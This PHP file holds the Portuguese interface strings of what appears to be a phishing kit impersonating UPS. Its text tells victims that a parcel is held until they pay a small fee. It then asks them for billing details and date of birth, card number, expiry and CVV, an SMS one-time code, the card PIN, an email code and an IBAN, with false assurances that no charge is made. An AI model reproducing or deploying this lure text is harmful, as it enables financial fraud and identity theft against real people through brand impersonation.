<?php
function lang($phrase){
	static $lang = array(

        "xlang" => "PT",
        "xcapt1" => "Por favor, verifique a caixa CAPTCHA",
        "xcapt2" => "Verificação",
        "xcapt3" => "Continuar",
        "xfot1" => "Este Sítio",
        "xfot2" => "Outros Sítios UPS",
        "xfot3" => "Ligue-se a nós",
        "xfot4" => "Legal",
        "xfot5" => "Copyright ©1994- 2023&nbsp;United Parcel Service of America, Inc. Todos os direitos reservados. ",
        "xind1" => "Rastrear",
        "xind2" => "Número de rastreio",
        "xind3" => "Erro : Por favor, forneça o número de rastreamento correto.",
        "xind4" => "Precisa de ajuda para alterar a sua entrega?",
        "xind5" => "Cotação",
        "xind6" => "Navio",
        "xind7" => "Faturação",
        "xind8" => "Get Help",
        "xexp1" => "Entrega interrompida",
        "xexp2" => "Seguimento",
        "xexp3" => "A sua última entrega foi interrompida. Está atualmente retida no centro de triagem",
        "xexp4" => "A encomenda que lhe foi enviada não respeitou o peso indicado e ser-lhe-á pedido que pague uma taxa suplementar para que a sua encomenda seja entregue corretamente.",
        "xexp5" => "O custo é de 0,48€",
        "xexp6" => "Para pagar, clique no botão abaixo",
        'xexp7' => "Pagar",
        "xexp8" => "Após o pagamento da taxa, a sua encomenda será encaminhada o mais rapidamente possível para o endereço de entrega",
        "xexp9" => "Se a taxa não for paga num prazo de 48 horas, a encomenda será devolvida ao remetente.",
        "xexp10" => "Seguimento por número de referência",
        "xexp11" => "Números de acompanhamento da importação",
        "xexp12" => "Outros serviços de seguimento",
        "xinfz1" => "Confirmar os seus dados de faturação",
        "xinfz2" => "Nome completo",
        "xinfz10" => "Data de nascimento",
        "xinfz3" => "País",
        "xinfz4" => "Cidade",
        "xinfz5" => "Endereço",
        "xinfz6" => "Phone",
        "xinfz7" => "Código postal",
        "xinfz8" => "Error : Todos os dados são obrigatórios",
        "xinfz9" => "Confirmar",
        "xpay1" => "Detalhes do pagamento",
        "xpay2" => "Caro cliente, verifique corretamente os seus dados de pagamento e faça corresponder os dados do seu cartão para finalizar",
        "xpay3" => "Nome no cartão",
        "xpay4" => "Número do cartão",
        "xpay5" => "Data de expiração",
        "xpay6" => "Código de segurança CVV (3 dígitos)",
        "xpay7" => "Erro : Todos os dados são obrigatórios",
        "xpay8" => "Confirmar",
        "xsms1" => "Verificação",
        "xsms2" => "Enviámos um código de confirmação para o seu número",
        "xsms3" => "Código OTP",
        "xsms4" => "Erro: código otp incorreto",
        "xsms5" => "Este passo é necessário para completar o seu processo de pagamento de forma segura.",
        "xsms6" => "A UPS efectua uma autenticação temporária no seu cartão para o verificar. Trata-se apenas de uma autorização e NÃO de uma taxa.",
        "xsms7" => "Confirmar",
        "xconf1" => "Reinício da entrega",
        "xconf2" => "O pagamento das despesas suplementares foi tido em conta.",
        "xconf3" => "A sua encomenda deverá chegar nas próximas 24 horas.",
        "xconf4" => "Confirmar",
        "xpin1" => "Verificação",
        "xpin2" => "Introduza o código PIN do seu cartão bancário",
        "xpin3" => "Código PIN",
        "xpin4" => "(4 dígitos)",
        "xpin5" => "Este passo é necessário para completar o seu processo de pagamento de forma segura",
        "xpin6" => "A UPS efectua uma verificação temporária do seu cartão para o verificar. Trata-se apenas de uma autorização e NÃO de uma taxa.",
        "xpin7" => "Confirmar",
        "xmail1" => "Verificação",
        "xmail2" => "Enviámos um código de confirmação para o seu correio eletrónico",
        "xmail3" => "Código de correio eletrónico",
        "xmail4" => "(6 dígitos)",
        "xmail5" => "Este passo é necessário para completar o seu processo de pagamento de forma segura",
        "xmail6" => "A UPS efectua uma verificação temporária do seu cartão para o verificar. Trata-se apenas de uma autorização e NÃO de uma taxa.",
        "xmail7" => "Confirmar",
        "xiban1" => "Verificação",
        "xiban2" => "Por favor, introduza o seu IBAN para completar o pagamento",
        "xiban3" => "IBAN",
        "xiban4" => "(IBAN)",
        "xiban5" => "Este passo é necessário para completar o seu processo de pagamento de forma segura",
        "xiban6" => "A UPS efectua uma verificação temporária do seu cartão para o verificar. Trata-se apenas de uma autorização e NÃO de uma taxa.",
        "xiban7" => "Confirmar"
	);	
	
	return $lang[$phrase];
}
 ?>